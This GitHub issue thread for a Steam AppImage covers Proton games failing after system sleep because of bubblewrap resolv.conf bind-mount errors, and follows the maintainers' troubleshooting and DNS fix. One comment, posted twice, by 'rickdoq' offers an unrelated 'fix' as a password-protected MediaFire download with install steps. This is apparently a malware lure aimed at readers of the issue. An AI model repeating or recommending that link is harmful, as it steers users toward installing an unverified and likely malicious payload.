### ISSUE TITLE
Games run under Proton will not launch if the system is put to sleep/suspended until steam is relaunched.

### ISSUE THREAD

**Issue by LostWarriorr** [ivan-hc/Steam-appimage#26]
Games run under Proton will not launch if the system is put to sleep/suspended until steam is relaunched.

Native Linux games run with no issues.

Console prints the following error:

>bwrap: Can't bind mount /oldroot/etc/resolv.conf on /newroot/etc/resolv.conf: Unable to mount source on destination: No such file or directory
>chdir "/media/$USER/Corsair MP510 NVME/SteamLibrary/steamapps/common/AbioticFactor"
>Adding process 722445 for gameID 427410
>Adding process 722446 for gameID 427410
>Adding process 722447 for gameID 427410
>bwrap: Can't bind mount /oldroot/etc/resolv.conf on /newroot/etc/resolv.conf: Unable to mount source on destination: No such file or directory
>Uploaded AppInterfaceStats to Steam
>Removing process 722447 for gameID 427410
>Removing process 722446 for gameID 427410
>Removing process 722445 for gameID 427410

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Samueru-sama** [comment]
Can you replicate the issue using the Steam in conty? https://github.com/Kron4ek/Conty

Also those bwrap errors only happen after the system sleeps right?

**Comment by LostWarriorr** [comment]
> Can you replicate the issue using the Steam in conty? https://github.com/Kron4ek/Conty

I would have to see about that. And figure out how to get that running

> Also those bwrap errors only happen after the system sleeps right?

Yes they appear only after the system sleeps from what I can see.

**Comment by LostWarriorr** [comment]
Proton doesn't even get initialized as using the PROTON_LOG=1 %command% doesn't even make a log.

**Comment by LostWarriorr** [comment]
> Can you replicate the issue using the Steam in conty? https://github.com/Kron4ek/Conty

This does appear to be an upstream issue with Conty and not a problem with the Appimage itself. Running steam through Conty also uses less RAM than the Appimage.

**Comment by Samueru-sama** [comment]
> > Can you replicate the issue using the Steam in conty? https://github.com/Kron4ek/Conty
> 
> This does appear to be an upstream issue with Conty and not a problem with the Appimage itself. 

I think it is an issue with bubblewrap losing the binded paths after sleep is triggered, something would need to bind them again.

>Running steam through Conty also uses less RAM than the Appimage.

Oh in that case I know what the problem is, are you sure it was a 1 GiB difference and not exactly 641 MiB?

Right now how the appimage works, the dwarfs image gets turned into an squashfsimage, when the appimage is launched first the dwarfs image put on `/tmp` and then it extracts itself again.

It basically means that we waste 641 MiB of ram (the size of the conty container).

Unfortunately the appimage runtime doesn't work with dwarfs so basically whole building process would need to be changed to fix that issue. 😅

**Comment by ivan-hc** [comment]
> Unfortunately the appimage runtime doesn't work with dwarfs so basically whole building process would need to be changed to fix that issue. 😅

the day I'll fix this issue https://github.com/ivan-hc/ArchImage/issues/20 (and the day I will be able again to install Nvidia drivers) I'll rebase all my Conty-based AppImages on JuNest instead, to made them smaller and without this kind of problems.

**Comment by Samueru-sama** [comment]
@LostWarriorr Now RAM usage should be a bit lower.

**Comment by ivan-hc** [comment]
I close this for inactivity

**Comment by Samueru-sama** [comment]
@LostWarriorr The appimage has been updated and now uses a totally different method, let us know if the bug is still present.

**Comment by CompeyDev** [comment]
Using the latest release drops this warning in the log:

```
[ WARNING ][2025.12.09 13:10:37]: Host /etc/resolv.conf is unshared! 
```

...and the launched steam no longer has network connectivity, likely due to it being unable to correctly resolve DNS inquiries. My steam is completely unusable now. It should also be worth noting that I am using a VPN which sets a specific DNS server.

**Comment by VHSgunzo** [comment]
> this warning

This is expected behavior.


> and the launched steam no longer has network connectivity, likely due to it being unable to correctly resolve DNS inquiries.

Google and Cloudflare DNS are specified in resolv.conf in the container. Are they unavailable from your network?
```
nameserver 8.8.8.8
nameserver 8.8.4.4
nameserver 1.1.1.1
nameserver 1.0.0.1
```

**Comment by CompeyDev** [comment]
Yep, this works alright now! Thank you for the prompt bug fix :)

**Comment by CompeyDev** [comment]
Just discovered an issue with this. On restarting steam using a "restart now" option in the UI or similar, it gets in a loop where:

```
bwrap: Can't bind mount /oldroot/etc/resolv.conf on /newroot/etc/resolv.conf: Unable to mount source on destination: No such file or directory
```

Sending a `SIGKILL` and manually re-running the AppImage seems to fix it.

**Comment by VHSgunzo** [comment]
> an issue with this

What specific steps are required to reproduce the issue, and does it occur consistently or was it a one-time occurrence?

**Comment by VHSgunzo** [comment]
> I am able to sporadically reproduce it while changing the download servers location and clicking "restart now" on the subsequent prompt that shows.

I tried to reproduce this by switching the release branch to Beta and back, and by changing the global proton version in the Steam settings several times (with steam restart) and I even tried to do it with a game running through proton in the background, but I was unable to reproduce it.
